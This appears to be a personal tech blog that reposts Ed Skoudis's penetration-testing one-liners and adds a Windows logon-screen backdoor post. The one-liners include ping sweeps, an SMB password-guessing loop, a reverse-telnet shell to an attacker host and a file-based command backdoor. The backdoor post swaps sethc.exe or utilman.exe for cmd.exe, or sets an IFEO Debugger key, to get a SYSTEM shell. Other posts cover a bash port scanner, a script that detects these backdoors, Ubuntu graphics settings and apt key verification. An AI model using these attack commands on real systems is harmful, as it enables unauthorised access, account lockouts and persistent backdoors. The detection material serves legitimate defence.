Wednesday, August 15, 2012

Pentesting ninjitsu - Ed Skoudis

http://www.jedge.com/wordpress/2008/12/penetration-testing-ninjitsu/

Great article, very nice commands:
---------------------------------------------------------------

Ping Sweep
C:\> for /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply"
(on a LAN an unreachable address answers "Reply from <your own IP>: Destination host unreachable", so filtering on "TTL=" instead of "Reply" avoids those false positives)

Reverse DNS Lookup
C:\> for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i

Dictionary Attack
C:\> for /f %i in (user.txt) do @(for /f %j in (pass.txt) do @echo %i:%j & @net use \\10.10.10.10 %j /u:%i 2>nul && echo %i:%j >> success.txt && net use \\10.10.10.10 /del)
(check the lockout threshold with "net accounts /domain" first, or this will lock out every account in user.txt)

Ninjitsu II

Linux Command-Line Port Scanner
$ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done
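The same /dev/tcp trick as the one-liner above, as an added example that is not from the Skoudis article: wrapped in functions, with a per-port timeout so a filtered port (no RST, no SYN/ACK) cannot stall the loop, and with the connection-refused noise dropped. It assumes bash (the /dev/tcp pseudo-device is a bash feature, not POSIX sh) and, optionally, the coreutils timeout command; the host, port range and the /tmp/ports.txt output path are just the one-liner's defaults.

```shell
#!/usr/bin/env bash
# Added example (not from the original article): a bash-only TCP connect
# scanner built on /dev/tcp, with a per-port timeout.  Assumes bash and,
# optionally, coreutils `timeout`.  Outer syntax is POSIX sh; the actual
# connect always happens inside a child bash.

# probe HOST PORT: return 0 if a TCP connect to HOST:PORT succeeds, 1 otherwise.
# The connect runs in a child bash so that `timeout` can kill it; a failed
# redirection makes that child exit non-zero, and its error text is dropped.
probe() {
    local host=$1 port=$2
    if command -v timeout >/dev/null 2>&1; then
        timeout "${PROBE_TIMEOUT:-2}" bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null
    else
        bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null
    fi
}

# scan HOST FIRST LAST: print each open port in [FIRST, LAST], one per line.
scan() {
    local host=$1 port=$2 last=$3
    while [ "$port" -le "$last" ]; do
        probe "$host" "$port" && printf '%s\n' "$port"
        port=$((port + 1))
    done
    return 0
}

# Usage: ./scan.sh HOST [FIRST] [LAST]; results also go to /tmp/ports.txt,
# like the original one-liner.  With no arguments nothing is scanned.
if [ $# -ge 1 ]; then
    scan "$1" "${2:-1}" "${3:-1024}" | tee /tmp/ports.txt
fi
```

PROBE_TIMEOUT (seconds, default 2) bounds how long a filtered port can hold the loop; the original one-liner has no such bound and can hang on the first firewalled port it meets.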

Linux Command-Line Backdoor via “Reverse Telnet”
$ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]

The Windows Command Line Port Scanner Using FTP Client
C:\> for /L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt

Windows Command-Line File Transfer
C:\> type [filename] > \\[machine]\[share]\[filename]

Backdoors: The File Shell
C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1

Ninjitsu III

Wireless Sniffing
C:\> for /L %i in (1,0,2) do @(netsh interface set interface "wireless network connection" disable & ping -n 3 127.0.0.1 >nul & netsh interface set interface "wireless network connection" enable & ping -n 4 127.0.0.1 >nul & netsh wlan show networks mode=bssid)

Install Telnet Client Vista
C:\> pkgmgr /iu:"TelnetClient"

Install Telnet Server Vista
C:\> pkgmgr /iu:"TelnetServer"

Install IIS 7.0
C:\> pkgmgr /iu:IIS-WebServerRole;WAS-WindowsActivationService;WAS-ProcessModel;WAS-NetFxEnvironment;WAS-ConfigurationAPI

List Domain Password Settings
C:\>net accounts /domain

Tuesday, June 5, 2012

Linux Ubuntu 12.04 - Ati / AMD discrete graphics

After searching a LOT on the web, forums, etc., I found a page with a tip that works to change the Linux X server to discrete graphics.

http://thealarmclocksixam.wordpress.com/2012/03/23/ubuntu-12-04-and-hybrid-graphics-on-sony-vaio-s/

I used this on my HP dv6 laptop.

Here are the steps:
1. edit /etc/modprobe.d/blacklist.conf

2. add these 2 lines to the end of the file, so the radeon driver is not loaded at boot and the integrated GPU drives the display
# radeon
blacklist radeon

3. edit /etc/rc.local and add these lines before the final "exit 0"
# load radeon late, so vgaswitcheroo knows about the discrete card
modprobe radeon
# OFF powers down whichever card is NOT driving the display, i.e. the AMD GPU
# (the original recipe also ran "chown -R $USER:$USER /sys/kernel/debug" here;
# that is not needed, because rc.local already runs as root and $USER is empty
# at that point, and handing debugfs to an unprivileged user is a bad idea anyway)
echo OFF > /sys/kernel/debug/vgaswitcheroo/switch

4. reboot and it should be good

5. you can check if it worked
cat /sys/kernel/debug/vgaswitcheroo/switch
the DIS (discrete card) line should show Off rather than Pwr
 
No more fan noise, no more heat...
Very nice hack

:D

Thursday, May 3, 2012

--win 7 -- (still..) "good usage" for utilman.exe and sethc.exe


Physical access -> bootcd -> change .exe -> 0wned



If you have access to a Win 7 box, you can still replace c:\windows\system32\sethc.exe with a copy of cmd.exe (or a meterpreter payload) and trigger it by pressing the Shift key five times at the logon screen. The Sticky Keys helper is launched by winlogon as SYSTEM, so you get a SYSTEM shell without ever logging in.


The same works with c:\windows\system32\utilman.exe, triggered with Win+U at the logon screen. In both cases boot from a live CD to swap the files: on the running system they are owned by TrustedInstaller and the ACLs stop you from overwriting them in place.

....
You can get the same result without touching the files at all: set an executable of your choice as the Debugger for sethc.exe under Image File Execution Options in the registry. Windows then starts the "debugger" in place of the program whenever sethc.exe is launched, including from the logon screen, still as SYSTEM. From a privileged (administrator) command shell:

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

The same goes for utilman.exe. Writing this key needs admin rights on the running system, or offline editing of the SOFTWARE hive from the boot CD.

....
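The defender's side of the post above, as an added example that is not part of the original post: two offline checks for the sethc.exe / utilman.exe backdoors, written for a Linux forensic workstation. The first reads a reg export of the Image File Execution Options key (converted from UTF-16 with iconv -f UTF-16 -t UTF-8 ifeo.reg > ifeo.txt) and reports any logon-screen accessibility binary that has a Debugger value; the second walks the System32 directory of a mounted Windows volume and reports accessibility binaries that are byte-for-byte copies of cmd.exe. The reg export and the volume tree used in the demo are constructed samples; the list of accessibility binaries is the set winlogon launches from the logon screen.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): offline detection of the
# IFEO-Debugger and file-swap variants of the sethc/utilman backdoor.
# Inputs: a UTF-8-converted `reg export` of the IFEO key, and the System32
# directory of a mounted Windows volume.  Samples below are constructed.

# Accessibility helpers that winlogon launches as SYSTEM from the logon screen.
ACCESSIBILITY_BINS="sethc.exe utilman.exe osk.exe narrator.exe magnify.exe displayswitch.exe atbroker.exe"

lower() { printf '%s' "$1" | tr 'A-Z' 'a-z'; }

# ifeo_debuggers FILE: print "<binary> <debugger path>" for every IFEO subkey
# of an accessibility binary that carries a Debugger value.
ifeo_debuggers() {
    local key= bin val line cr
    cr=$(printf '\r')
    while IFS= read -r line; do
        line=${line%$cr}                       # reg export uses CRLF line endings
        case $line in
            \[*\]) key=${line#\[}; key=${key%\]} ;;
            \"Debugger\"=\"*)
                case $key in
                    *"Image File Execution Options"\\*)
                        bin=$(lower "${key##*\\}")         # last path component of the key
                        case " $ACCESSIBILITY_BINS " in
                            *" $bin "*)
                                val=${line#\"Debugger\"=\"}; val=${val%\"}
                                # reg export doubles backslashes inside string values
                                printf '%s %s\n' "$bin" "$(printf '%s' "$val" | sed 's/\\\\/\\/g')"
                                ;;
                        esac ;;
                esac ;;
        esac
    done < "$1"
    return 0
}

# replaced_binaries SYS32: print accessibility binaries whose contents are
# identical to cmd.exe (the classic swap).  Other replacements (meterpreter,
# a renamed powershell.exe) need comparison against known-good hashes taken
# from installation media instead.
replaced_binaries() {
    local sys32=$1 ref bin
    ref=$(sha256sum "$sys32/cmd.exe" | cut -d' ' -f1) || return 1
    for bin in $ACCESSIBILITY_BINS; do
        [ -f "$sys32/$bin" ] || continue
        if [ "$(sha256sum "$sys32/$bin" | cut -d' ' -f1)" = "$ref" ]; then
            printf '%s\n' "$bin"
        fi
    done
    return 0
}

# Constructed sample of a UTF-8-converted reg export: one backdoored entry,
# one harmless IFEO value, and a developer JIT debugger on a non-logon binary.
write_sample_reg() {
    printf '%s\r\n' \
      'Windows Registry Editor Version 5.00' \
      '' \
      '[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]' \
      '"Debugger"="C:\\windows\\system32\\cmd.exe"' \
      '' \
      '[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe]' \
      '"UseFilter"=dword:00000001' \
      '' \
      '[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]' \
      '"Debugger"="C:\\Tools\\vsjitdebugger.exe"' > "$1"
}

# Constructed stand-in for a mounted volume: sethc.exe is a copy of cmd.exe.
write_sample_volume() {
    local sys32=$1/Windows/System32
    mkdir -p "$sys32"
    printf 'stand-in for cmd.exe\n' > "$sys32/cmd.exe"
    cp "$sys32/cmd.exe" "$sys32/sethc.exe"
    printf 'stand-in for utilman.exe\n' > "$sys32/utilman.exe"
}

# Usage: ./check.sh IFEO.txt [SYS32_DIR]; with no arguments, run on the samples.
if [ $# -ge 1 ]; then
    ifeo_debuggers "$1"
    [ -n "${2:-}" ] && replaced_binaries "$2"
else
    work=$(mktemp -d)
    write_sample_reg "$work/ifeo.txt"
    write_sample_volume "$work/vol"
    echo "IFEO debuggers on logon-screen binaries:"; ifeo_debuggers "$work/ifeo.txt"
    echo "binaries identical to cmd.exe:";           replaced_binaries "$work/vol/Windows/System32"
    rm -rf "$work"
fi
```

On the samples this reports sethc.exe with its Debugger of C:\windows\system32\cmd.exe and sethc.exe as a copy of cmd.exe, while the notepad.exe JIT-debugger entry is ignored because notepad is never launched from the logon screen.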

Friday, March 16, 2012

apt-get gpg keys problem

W: GPG error: http://volatile.debian.org lenny/volatile Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY DFD993306D849617

Fetch the key ID that apt is complaining about from a keyserver (the first keyserver below didn't resolve, so the same command is retried against another), then hand the key to apt-key:

root@bt:/etc/apt# gpg --keyserver wwwkeys.eu.pgp.net --recv-keys DFD993306D849617
gpg: directory `/root/.gnupg' created
gpg: new configuration file `/root/.gnupg/gpg.conf' created
gpg: WARNING: options in `/root/.gnupg/gpg.conf' are not yet active during this run
gpg: keyring `/root/.gnupg/secring.gpg' created
gpg: keyring `/root/.gnupg/pubring.gpg' created
gpg: requesting key 6D849617 from hkp server wwwkeys.eu.pgp.net
gpgkeys: HTTP fetch error 6: Couldn't resolve host 'wwwkeys.eu.pgp.net'
gpg: no valid OpenPGP data found.
gpg: Total number processed: 0

root@bt:/etc/apt# gpg --keyserver wwwkeys.uk.pgp.net --recv-keys DFD993306D849617
gpg: requesting key 6D849617 from hkp server wwwkeys.uk.pgp.net
gpg: /root/.gnupg/trustdb.gpg: trustdb created
gpg: key 6D849617: public key "Debian-Volatile Archive Automatic Signing Key (5.0/lenny)" imported
gpg: no ultimately trusted keys found
gpg: Total number processed: 1
gpg:               imported: 1  (RSA: 1)
root@bt:/etc/apt# gpg --armor --export DFD993306D849617 | apt-key add -
OK
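The same fix as an added example, not part of the original post, with the check the transcript above skips: importing whatever key apt names only silences the warning, so the key is worth trusting only if its full fingerprint matches one published by the archive owner (for Debian, the debian-archive-keyring package; for a third-party repository, its web page). The script extracts the missing key IDs from apt's output, fetches a key into a throwaway keyring, compares its fingerprint, and only then installs it under /etc/apt/trusted.gpg.d/ (apt-key itself is deprecated). It assumes gpg 2.x, coreutils and a reachable hkps keyserver; the apt output in the demo is constructed and 0123456789ABCDEF is a made-up key ID.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): handle apt's NO_PUBKEY warning
# without trusting whatever key the error names.  Assumes gpg 2.x, coreutils
# and a reachable hkps keyserver.  The sample apt output is constructed.

# nopubkey_ids: read apt output on stdin, print each missing long key ID once.
nopubkey_ids() {
    grep -o 'NO_PUBKEY [0-9A-Fa-f]\{16\}' | cut -d' ' -f2 | sort -u
}

# fetch_key KEYID EXPECTED_FINGERPRINT [NAME]: fetch KEYID into a throwaway
# keyring, refuse it unless its fingerprint matches, then install it for apt
# as /etc/apt/trusted.gpg.d/NAME.gpg (binary keyring; no apt-key needed).
fetch_key() {
    local keyid=$1 name=${3:-$1} home fpr expected
    expected=$(printf '%s' "$2" | tr -d ' ' | tr 'a-f' 'A-F')
    home=$(mktemp -d) || return 1
    if ! GNUPGHOME=$home gpg --batch --quiet --keyserver hkps://keyserver.ubuntu.com \
            --recv-keys "$keyid"; then
        rm -rf "$home"; return 1
    fi
    fpr=$(GNUPGHOME=$home gpg --batch --with-colons --fingerprint "$keyid" \
          | awk -F: '$1 == "fpr" { print $10; exit }')
    if [ "$fpr" != "$expected" ]; then
        echo "refusing $keyid: fingerprint $fpr does not match $expected" >&2
        rm -rf "$home"; return 1
    fi
    GNUPGHOME=$home gpg --batch --export "$keyid" > "/etc/apt/trusted.gpg.d/$name.gpg"
    rm -rf "$home"
}

# Constructed apt output: the real warning from this page twice (to show the
# de-duplication) plus one line naming a made-up key ID.
sample_apt_output() {
    cat <<'EOF'
W: GPG error: http://volatile.debian.org lenny/volatile Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY DFD993306D849617
W: GPG error: http://volatile.debian.org lenny/volatile Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY DFD993306D849617
W: GPG error: http://mirror.example.net squeeze Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 0123456789ABCDEF
EOF
}

# Usage:
#   apt-get update 2>&1 | ./fix-keys.sh list          # which keys are missing
#   ./fix-keys.sh fetch KEYID FINGERPRINT [NAME]      # verify and install one key
#   ./fix-keys.sh                                     # demo on the constructed sample
case ${1:-demo} in
    list)  nopubkey_ids ;;
    fetch) fetch_key "$2" "$3" "${4:-}" ;;
    *)     sample_apt_output | nopubkey_ids ;;
esac
```

The fingerprint argument is deliberately required: there is no way for the script to know whether 6D849617 is the Debian volatile key or something an attacker on the path uploaded to the keyserver under the same short ID, and only the full fingerprint from an out-of-band source settles that.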